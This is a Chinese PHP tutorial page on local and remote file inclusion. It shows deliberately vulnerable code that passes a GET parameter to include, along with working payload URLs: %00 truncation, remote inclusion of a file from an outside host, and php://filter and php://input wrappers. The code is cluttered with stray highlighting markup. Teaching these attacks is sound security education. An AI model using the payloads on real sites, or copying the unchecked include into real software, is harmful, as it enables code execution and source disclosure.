本地包含与远程包含 · PHP学习 · 看云

企业🤖AI智能体构建引擎，智能编排和调试，一键部署，支持知识库和私有化部署方案广告

# 本地包含与远程包含常见文件包含函数 include(),require(),include\_once(),require\_once()函数 **本地包含** ``` <pre class="calibre10">``` 访问 http<span class="token3">:</span><span class="token1">/</span><span class="token1">/</span>localhost<span class="token1">/</span>test<span class="token1">/</span>ddd<span class="token3">.</span>php<span class="token1">?</span>file<span class="token1">=</span><span class="token6">1.</span>txt <span class="token">//ddd.php</span> <span class="token5">if</span> <span class="token3">(</span><span class="token4">isset</span><span class="token3">(</span>$_GET<span class="token3">[</span><span class="token2">'file'</span><span class="token3">]</span><span class="token3">)</span><span class="token3">)</span> <span class="token3">{</span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'file'</span><span class="token3">]</span><span class="token3">;</span> include $file<span class="token3">;</span> <span class="token3">}</span> <span class="token">//1.txt</span> <span class="token1"><</span><span class="token1">?</span>php <span class="token4">phpinfo</span><span class="token3">(</span><span class="token3">)</span><span class="token3">;</span> <span class="token1">?</span><span class="token1">></span> ``` ``` 或者 ``` <pre class="calibre10">``` <span class="token">//如果是 include $file.".php";需要%00截断</span> 访问 http<span class="token3">:</span><span class="token1">/</span><span class="token1">/</span>localhost<span class="token1">/</span>test<span class="token1">/</span>ddd<span class="token3">.</span>php<span class="token1">?</span>file<span class="token1">=</span><span class="token6">1.</span>txt<span class="token1">%</span><span class="token6">00</span> <span class="token">//ddd.php</span> <span class="token5">if</span> <span class="token3">(</span><span class="token4">isset</span><span class="token3">(</span>$_GET<span class="token3">[</span><span class="token2">'file'</span><span class="token3">]</span><span class="token3">)</span><span class="token3">)</span> <span class="token3">{</span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'file'</span><span class="token3">]</span><span class="token3">;</span> include $file<span class="token3">.</span><span class="token2">".php"</span><span class="token3">;</span> <span class="token3">}</span> <span class="token">//1.txt</span> <span class="token1"><</span><span class="token1">?</span>php <span class="token4">phpinfo</span><span class="token3">(</span><span class="token3">)</span><span class="token3">;</span> <span class="token1">?</span><span class="token1">></span> ``` ``` **远程包含：** 需要开启的扩展：allow\_url\_fopen 和 allow\_url\_include 为 On 且版本>=5.2.0 [allow\_url\_fopen='1'](https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)：该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。 [allow\_url\_include='0'](https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)：该选项为on便是允许包含URL 对象文件等 ' 5.2新增7.4移除 ``` <pre class="calibre10">``` <span class="token">//后面加个问号</span> 访问 http<span class="token3">:</span><span class="token1">/</span><span class="token1">/</span>localhost<span class="token1">/</span>test<span class="token1">/</span>ddd<span class="token3">.</span>php<span class="token1">?</span>file<span class="token1">=</span>www<span class="token3">.</span>elseweb<span class="token3">.</span>com<span class="token1">/</span><span class="token6">1.</span>txt<span class="token1">?</span> ``` ``` 伪协议： 1. php://filter/read=convert.base64-encode/resource= 在 allow\_url\_include = On 且 PHP >= 5.2.0 2. php://input 我们需要用到一个HackBar的插件，新版的要收费，我们可以选择[旧版本](https://pan.baidu.com/s/1gz4IyxjuITk_OkWwnDw30Q)的链接：安装好以后F12 调试台选择操作 ![](https://img.kancloud.cn/b9/47/b947706e5d89213f557391e3c0413ff5_546x191.png) 点击Execute运行